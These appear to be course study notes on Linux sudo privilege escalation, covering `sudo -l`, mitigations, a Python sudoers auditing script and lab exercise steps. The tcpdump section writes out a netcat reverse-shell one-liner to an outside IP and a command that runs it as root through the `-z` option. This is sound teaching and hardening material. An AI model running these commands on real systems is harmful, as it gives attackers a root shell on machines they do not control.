# Intro
- Sudo privs can be granted to an account, permitting the account to run certain commands in the context of the root (or another account) without having to change users or grant excessive privileges
- When the `sudo` command is issued, the system will check if the user issuing the command has the appropriate rights, as configured in `/etc/sudoers`
- When landing on a box, we should always check to see if the current user has any `sudo` privs by issuing the `sudo -l`
- Sometimes we will need to know the user's password to list their `sudo` rights
- NOTE: entries carrying the `NOPASSWD` option, however, are listed without entering a password ![[images/Pasted image 20260203202032.png]]
- It is easy to misconfigure `sudo` privs
- For example, a user may be granted root-level permissions without requiring a password
- Or the permitted command line might be specified too loosely, allowing us to run a program in an unintended way, resulting in privilege escalation
# Example Exploit of `tcpdump`
- As an example, if `/etc/sudoers` is edited to grant a user the right to run a command such as `tcpdump` via the following entry: `(ALL) NOPASSWD: /usr/sbin/tcpdump`, an attacker could leverage this to take advantage of the `postrotate-command` option
```bash
man tcpdump
<SNIP>
-z postrotate-command
Used in conjunction with the -C or -G options, this will make `tcpdump` run " postrotate-command file " where the file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
```
- By specifying the `-z` flag, an attacker could use `tcpdump` to execute a shell script, gain a reverse shell as the root user or run other privileged commands
- For example, an attacker could create the shell script `.test` containing a reverse shell and execute it as below:
```bash
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```
- But, to execute this exploit, we must first create the file that `postrotate-command` will run, containing a simple reverse shell one-liner
```bash
cat /tmp/.test
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
```
# Mitigations
- [AppArmor](https://wiki.ubuntu.com/AppArmor) in more recent distributions has predefined the commands used with the `postrotate-command`, effectively preventing command execution. Two best practices that should always be considered when provisioning `sudo` rights:
1. Always specify the absolute path to any binaries listed in the `sudoers` file entry. Otherwise, an attacker may be able to leverage PATH abuse (which we will see in the next section) to create a malicious binary that will be executed when the command runs (i.e., if the `sudoers` entry specifies `cat` instead of `/bin/cat` this could likely be abused).
2. Grant `sudo` rights sparingly and based on the principle of least privilege. Does the user need full `sudo` rights? Can they still perform their job with one or two entries in the `sudoers` file? Limiting the privileged commands that a user can run will greatly reduce the likelihood of successful privilege escalation.
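To turn the two best practices above and the `sudo -l` check from the intro into something repeatable, here is an added auditing script (my own example, not part of the original notes or of any sudo tooling). It parses constructed sample `sudoers` lines and constructed `sudo -l` output and flags exactly the patterns discussed on this page: `ALL` command grants, relative paths that are resolved through the caller's `PATH`, `NOPASSWD` entries, and binaries such as `tcpdump` that can spawn another program through an option even when listed with an absolute path. The sample data, the `SPAWNING_BINARIES` table and all function names are assumptions of this example.

```python
"""Audit sudoers user specifications and `sudo -l` output for the misconfigurations
described above. Added example; sample inputs are constructed, not from a real host."""
import os
import re
from typing import Dict, List

# Constructed sample /etc/sudoers content (not taken from any real system).
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
Cmnd_Alias      LOGS = /bin/cat /var/log/syslog
alice   ALL=(ALL) NOPASSWD: /usr/sbin/tcpdump
bob     ALL=(ALL) NOPASSWD: ALL
carol   ALL=(root) cat /var/log/syslog
dave    ALL=(root) /bin/cat /var/log/syslog
"""

# Constructed sample of what `sudo -l` prints for one user.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset
User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/sbin/tcpdump
    (root) /bin/cat /var/log/syslog
"""

# Binaries that can launch another program through an option even when listed with an
# absolute path. Only tcpdump (-z postrotate-command, discussed above) is included here;
# extend this table from your own hardening baseline rather than guessing.
SPAWNING_BINARIES = {"tcpdump": "-z postrotate-command executes an arbitrary program"}

# user  host=(runas) [TAG:] cmd, cmd ...   (runas is optional and defaults to root)
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
# `sudo -l` prints each grant as "    (runas) [TAG:] cmd"
SUDO_L_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")


def split_tags(spec: str):
    """Strip leading tags such as NOPASSWD: / SETENV: from one command spec."""
    tags, rest = [], spec.strip()
    while (m := TAG.match(rest)):
        tags.append(m.group(1))
        rest = rest[m.end():]
    return tags, rest.strip()


def check_commands(user: str, runas: str, cmds: str) -> List[Dict[str, str]]:
    """Apply the page's checks to a comma-separated command list for one grant."""
    findings: List[Dict[str, str]] = []
    nopasswd = False  # a NOPASSWD tag applies to every later command until PASSWD resets it
    for spec in cmds.split(","):  # simplification: commas inside arguments are not handled
        tags, cmd = split_tags(spec)
        if "NOPASSWD" in tags:
            nopasswd = True
        if "PASSWD" in tags:
            nopasswd = False
        binary = cmd.split()[0] if cmd else ""
        issues = []
        if binary == "ALL":
            issues.append(f"any command as ({runas})")
        elif not binary.startswith("/"):
            issues.append("relative path: resolved through the caller's PATH")
        elif os.path.basename(binary) in SPAWNING_BINARIES:
            issues.append(SPAWNING_BINARIES[os.path.basename(binary)])
        if nopasswd:
            issues.append(f"NOPASSWD: no password prompt before running as ({runas})")
        findings.extend({"user": user, "command": cmd, "issue": i} for i in issues)
    return findings


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Scan sudoers-format text; comments, Defaults and *_Alias lines are skipped."""
    findings: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m or m["user"].endswith("_Alias"):
            continue
        findings += check_commands(m["user"], m["runas"] or "root", m["cmds"])
    return findings


def audit_sudo_l(output: str) -> List[Dict[str, str]]:
    """Scan captured `sudo -l` output for the same patterns."""
    findings: List[Dict[str, str]] = []
    user = "?"
    for line in output.splitlines():
        header = re.match(r"^User (\S+) may run", line)
        if header:
            user = header.group(1)
            continue
        m = SUDO_L_LINE.match(line)
        if m:
            findings += check_commands(user, m["runas"], m["cmds"])
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS) + audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f['user']:8} {f['command']:28} {f['issue']}")
```

Run against the real file with `audit_sudoers(open("/etc/sudoers").read())` (root is needed to read it, and `/etc/sudoers.d/*` should be scanned the same way), or pipe saved `sudo -l` output into `audit_sudo_l`. On the constructed sample, `dave`'s entry (absolute path, password required, a binary that does not spawn programs) is the only one that produces no finding, which is the shape of entry the two best practices above aim for.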
---
# Exercise
- `ping` test ![[images/Pasted image 20260203202639.png]]
- `ssh` into the box with the given creds
- run `sudo -l` ![[images/Pasted image 20260203202633.png]]